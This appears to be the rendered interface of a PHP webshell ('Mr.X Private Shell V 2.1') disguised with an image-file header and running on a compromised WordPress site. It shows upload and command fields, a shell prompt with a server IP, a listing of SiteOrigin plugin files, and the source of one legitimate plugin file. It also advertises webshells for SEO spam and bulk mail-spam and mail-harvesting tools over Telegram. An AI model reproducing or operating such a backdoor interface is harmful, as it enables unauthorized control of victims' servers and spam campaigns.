����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
<?php

class SiteOrigin_Panels_Admin_Dashboard {

	function __construct() {
		add_action( 'wp_dashboard_setup', array( $this, 'register_dashboard_widgets' ), 15 );
		add_action( 'admin_print_styles', array( $this, 'enqueue_admin_styles' ) );
	}

	/**
	 * @return SiteOrigin_Panels_Admin_Dashboard
	 */
	public static function single() {
		static $single;
		return empty( $single ) ? $single = new self() : $single;
	}

	/**
	 * Register the dashboard widget
	 */
	public function register_dashboard_widgets(){
		if( function_exists( 'wp_dashboard_primary_output' ) ) {
			wp_add_dashboard_widget( 'so-dashboard-news', __( 'SiteOrigin Page Builder News', 'siteorigin-panels' ), array(
				$this,
				'dashboard_overview_widget'
			) );

			// Move Page Builder widget to the top
			global $wp_meta_boxes;

			$dashboard = $wp_meta_boxes['dashboard']['normal']['core'];
			$ours      = array( 'so-dashboard-news' => $dashboard['so-dashboard-news'] );

			$wp_meta_boxes['dashboard']['normal']['core'] = array_merge( $ours, $dashboard ); // WPCS: override ok.
		}
	}

	/**
	 * Enqueue the dashboard styles
	 */
	public function enqueue_admin_styles( $page ){
		$screen = get_current_screen();
		if( ! empty( $screen ) && $screen->id == 'dashboard' ) {
			wp_enqueue_style(
				'so-panels-dashboard',
				siteorigin_panels_url( 'css/dashboard.css' ),
				array( 'wp-color-picker' ),
				SITEORIGIN_PANELS_VERSION
			);
		}
	}

	/**
	 * Display the actual widget
	 */
	public function dashboard_overview_widget(){
		$feeds = array(
			array(
				'url'          => 'https://siteorigin.com/feed/',
				'items'        => 4,
				'show_summary' => 0,
				'show_author'  => 0,
				'show_date'    => 1,
			),
		);

		wp_dashboard_primary_output( 'so_dashboard_widget_news', $feeds );

		if( function_exists( 'wp_print_community_events_markup' ) ) {
			?>
			<p class="community-events-footer">
				<?php
				printf(
					'<a href="%1$s" target="_blank" rel="noopener noreferrer">%2$s <span class="screen-reader-text">%3$s</span><span aria-hidden="true" class="dashicons dashicons-external"></span></a>',
					esc_url( 'https://siteorigin.com/blog/' ),
					__( 'Blog', 'siteorigin-panels' ),
					/* translators: accessibility text */
					__( '(opens in a new window)', 'siteorigin-panels' )
				);
				echo ' | ';

				if( class_exists( 'SiteOrigin_Premium' ) ) {
					printf(
						'<a href="%1$s" target="_blank" rel="noopener noreferrer">%2$s <span class="screen-reader-text">%3$s</span><span aria-hidden="true" class="dashicons dashicons-email-alt"></span></a>',
						esc_url( 'mailto:support@siteorigin.com' ),
						__( 'Email Support', 'siteorigin-panels' ),
						/* translators: accessibility text */
						__( '(email SiteOrigin support)', 'siteorigin-panels' )
					);
				}
				else {
					printf(
						'<a href="%1$s" target="_blank" rel="noopener noreferrer">%2$s <span class="screen-reader-text">%3$s</span><span aria-hidden="true" class="dashicons dashicons-external"></span></a>',
						esc_url( 'https://siteorigin.com/thread/' ),
						__( 'Support Forum', 'siteorigin-panels' ),
						/* translators: accessibility text */
						__( '(opens in a new window)', 'siteorigin-panels' )
					);
				}

				if ( SiteOrigin_Panels::display_premium_teaser() ) {
					echo ' | ';
					printf(
						'<a href="%1$s" target="_blank" rel="noopener noreferrer" style="color: #2ebd59">%2$s <span class="screen-reader-text">%3$s</span><span aria-hidden="true" class="dashicons dashicons-external"></span></a>',
						/* translators: If a Rosetta site exists (e.g. https://es.wordpress.org/news/), then use that. Otherwise, leave untranslated. */
						esc_url( 'https://siteorigin.com/downloads/premium/' ),
						__( 'Get Premium', 'siteorigin-panels' ),
						/* translators: accessibility text */
						__( '(opens in a new window)', 'siteorigin-panels' )
					);
				}
				?>
			</p>
			<?php
		}
	}
}

Filemanager

Name Type Size Permission Actions
data Folder 0755
widgets Folder 0755
admin-dashboard.php File 3.81 KB 0644
admin-layouts.php File 17.14 KB 0644
admin-widget-dialog.php File 5.36 KB 0644
admin-widgets-bundle.php File 4.78 KB 0644
admin.php File 67.1 KB 0644
cache-renderer.php File 1.15 KB 0644
css-builder.php File 8.02 KB 0644
error_log File 6.62 KB 0644
functions.php File 2.69 KB 0644
home.php File 1.25 KB 0644
live-editor.php File 2.49 KB 0644
post-content-filters.php File 2.53 KB 0644
renderer-legacy.php File 5.62 KB 0644
renderer.php File 37.43 KB 0644
revisions.php File 2.76 KB 0644
settings.php File 26.11 KB 0644
sidebars-emulator.php File 7.46 KB 0644
styles-admin.php File 21.19 KB 0644
styles.php File 38.92 KB 0644
widget-shortcode.php File 3.39 KB 0644